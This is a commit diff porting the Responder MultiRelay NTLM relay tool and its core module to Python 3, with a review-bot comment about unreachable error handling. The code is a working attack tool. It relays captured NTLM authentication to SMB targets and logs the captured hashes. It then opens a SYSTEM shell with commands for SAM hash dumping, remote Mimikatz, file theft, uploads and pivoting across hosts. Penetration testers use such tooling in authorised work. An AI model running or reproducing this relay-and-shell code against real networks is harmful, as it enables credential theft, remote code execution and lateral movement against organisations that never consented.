Updated MultiRelay and associated files for use with Python3

nbadev2 2020-12-30 16:25:31 -05:00
commit 65971d14ea
4 changed files with 338 additions and 338 deletions


@ -23,17 +23,17 @@ import time
import random
import subprocess
from threading import Thread
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try:
from Crypto.Hash import MD5
except ImportError:
print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes."
print "You can install it on debian based os with this command: apt-get install python-crypto"
print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n"
print ("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
print ("You can install it on debian based os with this command: apt-get install python-crypto")
print ("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try:
import readline
except:
print "Warning: readline module is not available, you will not be able to use the arrow keys for command history"
print ("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass
from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import *
@ -72,18 +72,18 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script
options, args = parser.parse_args()
if options.TARGET is None:
print "\n-t Mandatory option is missing, please provide a target.\n"
print ("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help()
exit(-1)
if options.UserToRelay is None:
print "\n-u Mandatory option is missing, please provide a username to relay.\n"
print ("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help()
exit(-1)
if options.ExtraPort is None:
options.ExtraPort = 0
if not os.geteuid() == 0:
print color("[!] MultiRelay must be run as root.")
print (color("[!] MultiRelay must be run as root."))
sys.exit(-1)
OneCommand = options.OneCommand
@ -98,46 +98,46 @@ Pivoting = [2]
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def ShowWelcome():
print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)
print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CTRL-C.\n'
print color('/*',8,1)
print 'Use this script in combination with Responder.py for best results.'
print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n'
print 'This tool listen on TCP port 80, 3128 and 445.'
print 'For optimal pwnage, launch Responder only with these 2 options:'
print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.'
print 'If you do so, use taskkill (as system) to kill the process.'
print color('*/',8,1)
print color('\nRelaying credentials for these users:',8,1)
print color(UserToRelay,4,1)
print '\n'
print (color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
print ('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
print ('Usernames to relay (-u) are case sensitive.')
print ('To kill this script hit CTRL-C.\n')
print (color('/*',8,1))
print ('Use this script in combination with Responder.py for best results.')
print ('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
print ('This tool listen on TCP port 80, 3128 and 445.')
print ('For optimal pwnage, launch Responder only with these 2 options:')
print ('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
print ('If you do so, use taskkill (as system) to kill the process.')
print (color('*/',8,1))
print (color('\nRelaying credentials for these users:',8,1))
print (color(UserToRelay,4,1))
print ('\n')
ShowWelcome()
def ShowHelp():
print color('Available commands:',8,0)
print color('dump',8,1)+' -> Extract the SAM database and print hashes.'
print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)'
print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)'
print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)'
print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)'
print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\'
print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)'
print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to'
print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)'
print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)'
print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)'
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)'
print color('help',8,1)+' -> Print this message.'
print color('exit',8,1)+' -> Exit this shell and return in relay mode.'
print ' If you want to quit type exit and then use CTRL-C\n'
print color('Any other command than that will be run as SYSTEM on the target.\n',8,1)
print (color('Available commands:',8,0))
print (color('dump',8,1)+' -> Extract the SAM database and print hashes.')
print (color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
print (color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
print (color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
print (color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
print (color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
print (color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
print (color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
print (color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
print (color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
print (color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
print (color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
print (color('help',8,1)+' -> Print this message.')
print (color('exit',8,1)+' -> Exit this shell and return in relay mode.')
print (' If you want to quit type exit and then use CTRL-C\n')
print (color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging
@ -153,7 +153,7 @@ def UploadContent(File):
try:
RunFinger(Host[0])
except:
print "The host %s seems to be down or port 445 down."%(Host[0])
print ("The host %s seems to be down or port 445 down."%(Host[0]))
sys.exit(1)
@ -190,7 +190,7 @@ def ConnectToTarget():
except:
try:
sys.exit(1)
print "Cannot connect to target, host down?"
print ("Cannot connect to target, host down?")
except:
pass
@ -219,45 +219,45 @@ class HTTPProxyRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
smbdata = s.recv(2048) #got it here.
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -270,24 +270,24 @@ class HTTPProxyRelay(BaseRequestHandler):
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent."
print ("[+] SMB Session Auth sent.")
s.send(buffer1)
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
self.request.close()
return None
else:
else:
##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
except Exception:
self.request.close()
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
pass
class HTTPRelay(BaseRequestHandler):
@ -316,11 +316,11 @@ class HTTPRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
@ -340,21 +340,21 @@ class HTTPRelay(BaseRequestHandler):
smbdata = s.recv(2048) #got it here.
## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -367,25 +367,25 @@ class HTTPRelay(BaseRequestHandler):
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent."
print ("[+] SMB Session Auth sent.")
s.send(buffer1)
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
self.request.close()
return None
else:
else:
##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
except Exception:
self.request.close()
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
pass
class SMBRelay(BaseRequestHandler):
@ -456,11 +456,11 @@ class SMBRelay(BaseRequestHandler):
if Pivoting[0] == "1":
pass
else:
print "[+] SMB Session Auth sent."
print ("[+] SMB Session Auth sent.")
s.send(buffer1)
smbdata = s.recv(4096)
#We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account.
@ -480,9 +480,9 @@ class SMBRelay(BaseRequestHandler):
return None
except Exception:
self.request.close()
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
pass
#Interface starts here.
@ -499,20 +499,20 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
# On this block we do some verifications before dropping the user into the shell.
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target."
print "[+] Hashes were saved anyways in Responder/logs/ folder.\n"
print ("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
print ("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
print ("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == "\x73\x5e":
print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n"
print ("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:]
return False
@ -533,14 +533,14 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1":
pass
else:
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
print ("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned."
print ("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:]
return False
@ -549,7 +549,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1":
pass
else:
print "[+] Looks good, "+Username+" has admin rights on C$."
print ("[+] Looks good, "+Username+" has admin rights on C$.")
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate()
@ -560,12 +560,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
## Run one command.
if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
print "[+] Authenticated."
print ("[+] Authenticated.")
if OneCommand != None:
print "[+] Running command: %s"%(OneCommand)
print ("[+] Running command: %s"%(OneCommand))
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump:
print "[+] Dumping hashes"
print ("[+] Dumping hashes")
DumpHashes(data, s, Target[0])
os._exit(1)
@ -574,10 +574,10 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1":
pass
else:
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
print ("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print color('Connected to %s as LocalSystem.'%(Target[0]),2,1)
print (color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True:
@ -617,7 +617,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit":
print "[+] Returning in relay mode."
print ("[+] Returning in relay mode.")
del Cmd[:]
del ShellOpen[:]
return None
@ -647,7 +647,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:]
else:
print File+" does not exist, please specify a valid file."
print (File+" does not exist, please specify a valid file.")
del Cmd[:]
if Delete:
@ -669,7 +669,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:]
else:
print RunAsFileName+" does not exist, please specify a valid file."
print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if LCmd:
@ -685,7 +685,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print MimikatzFilename+" does not exist, please specify a valid file."
print (MimikatzFilename+" does not exist, please specify a valid file.")
del Cmd[:]
if Mimi32:
@ -697,12 +697,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print Mimikatzx86Filename+" does not exist, please specify a valid file."
print (Mimikatzx86Filename+" does not exist, please specify a valid file.")
del Cmd[:]
if Pivot:
if Pivot[0] == Target[0]:
print "[Pivot Verification Failed]: You're already on this host. No need to pivot."
print ("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
del Pivot[:]
del Cmd[:]
else:
@ -718,7 +718,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
if Status == True:
print "[+] Pivoting to %s."%(Pivot[0])
print ("[+] Pivoting to %s."%(Pivot[0]))
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -734,11 +734,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
return None
if Status == False:
print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host."
print ("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
del Cmd[:]
del Pivot[:]
else:
print RunAsFileName+" does not exist, please specify a valid file."
print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if Scan:
@ -762,11 +762,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:]
else:
print SysSVCFileName+" does not exist, please specify a valid file."
print (SysSVCFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n"
print ("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -789,7 +789,7 @@ def serve_thread_tcp(host, port, handler):
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)
print (color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main():
try:
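Review bot: The error message in the ConnectToTarget hunk (`@ -190,7 +190,7 @@`) is unreachable: `print ("Cannot connect to target, host down?")` comes after `sys.exit(1)` inside the inner `try`, and the bare `except: pass` around it swallows the SystemExit too, so on a failed connection the function neither reports anything nor exits. The commit only re-parenthesises the print and leaves that ordering intact. Reorder so the message is emitted before exiting and let SystemExit propagate: `print("Cannot connect to target, host down?")` followed by `sys.exit(1)`, with the inner `try`/`except` removed. The same bare `except:` pattern in the UploadContent hunk (`@ -153,7 +153,7 @@`) and the readline import at the top of the file should at least name the exception they expect (`except OSError:` / `except ImportError:`) so a Ctrl-C or a genuine bug is not silently eaten. ConnectToTarget's body starts and ends outside the hunk, so the outer `except:` and what it wraps are not visible here.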


@ -24,7 +24,7 @@ import re
import datetime
import threading
import uuid
from RelayMultiPackets import *
from MultiRelay.RelayMultiPackets import *
from odict import OrderedDict
from base64 import b64decode, b64encode
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump')))
@ -57,17 +57,17 @@ class Packet():
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
#Function used to verify if a previous auth attempt was made.
def ReadData(Outfile, Client, User, Domain, Target, cmd):
@ -75,7 +75,7 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
if re.search(Login.encode('hex'), filestr.read().encode('hex')):
print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
print ("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User))
return True
else:
@ -84,12 +84,12 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
raise
def ServeOPTIONS(data):
WebDav= re.search('OPTIONS', data)
if WebDav:
Buffer = WEBDAV_Options_Answer()
return str(Buffer)
WebDav= re.search('OPTIONS', data)
if WebDav:
Buffer = WEBDAV_Options_Answer()
return str(Buffer)
return False
return False
def IsSMBAnonymous(data):
SSPIStart = data.find('NTLMSSP')
@ -101,168 +101,168 @@ def IsSMBAnonymous(data):
return False
def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail." )
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if ('!' + User) in UserToRelay:
print "[+] Username: %s is blacklisted, dropping connection." % User
print ("[+] Username: %s is blacklisted, dropping connection." % User)
return None, None
elif User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, HostName, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return User, HostName
return User, HostName
else:
print "[+] Username: %s not in target list, dropping connection."%(User)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None
if NthashLen > 24:
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if NthashLen > 24:
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return User, Domain
return User, Domain
else:
print "[+] Username: %s not in target list, dropping connection."%(User)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None
def ParseSMBHash(data,client, challenge,UserToRelay,Host,Pivoting): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
